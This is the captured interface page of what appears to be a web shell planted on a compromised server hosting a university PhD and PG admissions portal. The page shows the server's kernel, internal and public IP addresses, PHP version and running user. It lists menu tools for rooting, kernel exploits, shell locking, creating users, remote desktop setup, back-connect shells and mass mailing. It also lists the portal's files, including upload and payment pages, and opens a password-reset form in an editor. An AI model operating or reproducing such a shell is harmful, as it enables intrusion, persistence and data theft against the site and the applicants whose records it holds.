Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.15.3.17
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phdadm /
acu /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
040_logo.jpg
85.69
KB
-rwxr-xr-x
MainPage.html
52.32
KB
-rwxr-xr-x
Ph.D Notification 2022 letter ...
131.35
KB
-rw-r--r--
academicdetails.html
4.47
KB
-rw-r--r--
academicdetails_acu.html
2.99
KB
-rw-r--r--
acu_logo.jpg
85.69
KB
-rwxr-xr-x
acu_otherdetails.html
2.98
KB
-rw-r--r--
add-course-payment.html
692
B
-rwxr-xr-x
add-course.html
1.23
KB
-rwxr-xr-x
adm-order.html
999
B
-rwxr-xr-x
app-status.html
3.11
KB
-rwxr-xr-x
appFor.html
1.43
KB
-rw-r--r--
basic.css
9.37
KB
-rwxr-xr-x
casual-seat-allotment.html
1.16
KB
-rwxr-xr-x
dat.json
5.03
KB
-rwxr-xr-x
employmentdetails_acu.html
3.21
KB
-rw-r--r--
ent-application.html
70.22
KB
-rwxr-xr-x
forgotPassword.html
5.11
KB
-rwxr-xr-x
genRankPrio.php
894
B
-rwxr-xr-x
index.php
6.67
KB
-rwxr-xr-x
index_adm.html
5.42
KB
-rwxr-xr-x
instruction.html
10.69
KB
-rwxr-xr-x
login.html
7.01
KB
-rwxr-xr-x
loginpage.css
2.21
KB
-rwxr-xr-x
main.css
6.06
KB
-rwxr-xr-x
make-payment.html
452
B
-rwxr-xr-x
makepay_acu.html
3.31
KB
-rw-r--r--
makepayment.html
2.3
KB
-rw-r--r--
mock-seat-allotment.html
608
B
-rwxr-xr-x
new.html
15.74
KB
-rw-r--r--
option-entry-cr.html
2.34
KB
-rwxr-xr-x
option-entry.html
2.32
KB
-rwxr-xr-x
otherdetails.html
3.9
KB
-rw-r--r--
particularpublication.html
2.4
KB
-rw-r--r--
personaldetails.html
16.86
KB
-rw-r--r--
personaldetails_acu.html
14.69
KB
-rw-rw-r--
pg-forgotPassword.html
4.1
KB
-rwxr-xr-x
pg-sign-up.html
7.99
KB
-rwxr-xr-x
pg_instruction.html
19.7
KB
-rwxr-xr-x
pgadm.html
67.76
KB
-rwxr-xr-x
phdadm.html
19.7
KB
-rw-rw-r--
researchexp.html
6.95
KB
-rw-rw-r--
seat-allotment.html
5.17
KB
-rwxr-xr-x
seatAllot.php
7.23
KB
-rwxr-xr-x
seat_status.php
2.08
KB
-rwxr-xr-x
sign-up.html
7.29
KB
-rwxr-xr-x
support.html
4.76
KB
-rwxr-xr-x
teachingexperience.html
4.72
KB
-rw-r--r--
ugcnet.html
4.57
KB
-rw-r--r--
upload_file.php
787
B
-rwxr-xr-x
upload_file_pg.php
746
B
-rwxr-xr-x
uploaddoc.html
8.57
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pg-forgotPassword.html
<div class="card1" style="min-height: 50vh" id="sign-up-scroll"> <center><p style="color: #fff" class="font-25">Forgot Password</p></center> <div class="body"> <div id="idForgotPasswd"> <form id="forgot_password_Email"> <!-- <div class="input-group"> <span class="input-group-addon"> <i class="material-icons">smartphone</i> </span> <div class="form-line"> <input type="text" id='mobile' class="form-control" name="Mobile" placeholder="Registered Mobile" minlength="10" maxlength="10" required autofocus> </div> </div> --> <div class="inner-addon left-addon m-b-20"> <i class="material-icons">smartphone</i> <input type="text" id="mobile" class="form-control1" name="Mobile" placeholder="Registered Mobile" minlength="10" maxlength="10" required autofocus /> </div> <span id="confirm" class="pull-left p-b-10" style="color: #0087ff"> </span> <div class="row"> <div class="col-xs-4 col-xs-offset-8"> <button id="btn_recover" class="btn bg-blue waves-effect" onclick="recover()" > Send-OTP </button> </div> </div> </form> <form id="resetpasswordform"> <!-- <div class="input-group"> <span class="input-group-addon"> <i class="material-icons">smartphone</i> </span> <div class="form-line"> <input type="text" id='motp' class="form-control" name="Mobile otp" minlength="6" placeholder="OTP" required> </div> </div> --> <div class="inner-addon left-addon m-b-20"> <i class="material-icons">smartphone</i> <input type="text" id="motp" class="form-control1" name="Mobile otp" minlength="6" placeholder="OTP" required /> </div> <div class="inner-addon left-addon m-b-20"> <i class="material-icons">lock</i> <input type="password" id="password" class="form-control1" name="password" minlength="8" placeholder="Password" data-toggle="tooltip" data-placement="top" title="Minimum 8 Characters" maxlength="25" required /> </div> <div class="inner-addon left-addon m-b-20"> <i class="material-icons">lock</i> <input type="password" id="cpassword" class="form-control1" name="confirm" placeholder="Confirm Password" data-toggle="tooltip" data-placement="top" title="Re-Enter Password" maxlength="25" required /> </div> <button class="btn btn-block btn-lg bg-mycol waves-effect" id="confirm-btn" onclick="resetPasswd()" > Reset Password </button> </form> <div class="row m-t-20 m-b--5 align-center"> <a style="color: #fff; font-weight: 800" href="login.html" >Back to Sign In!</a > </div> </div> </div> </div> <!-- <script type="text/javascript"> $('form').submit(false); $('#forgot_password_Email').validate({ highlight: function (input) { $(input).parents('.form-line').addClass('error'); }, unhighlight: function (input) { $(input).parents('.form-line').removeClass('error'); }, errorPlacement: function (error, element) { $(element).parents('.inner-addon').append(error).find("label").css("color", "red"); } }); </script> --> <script src="../js/pg/forgot-password.js"></script>
Close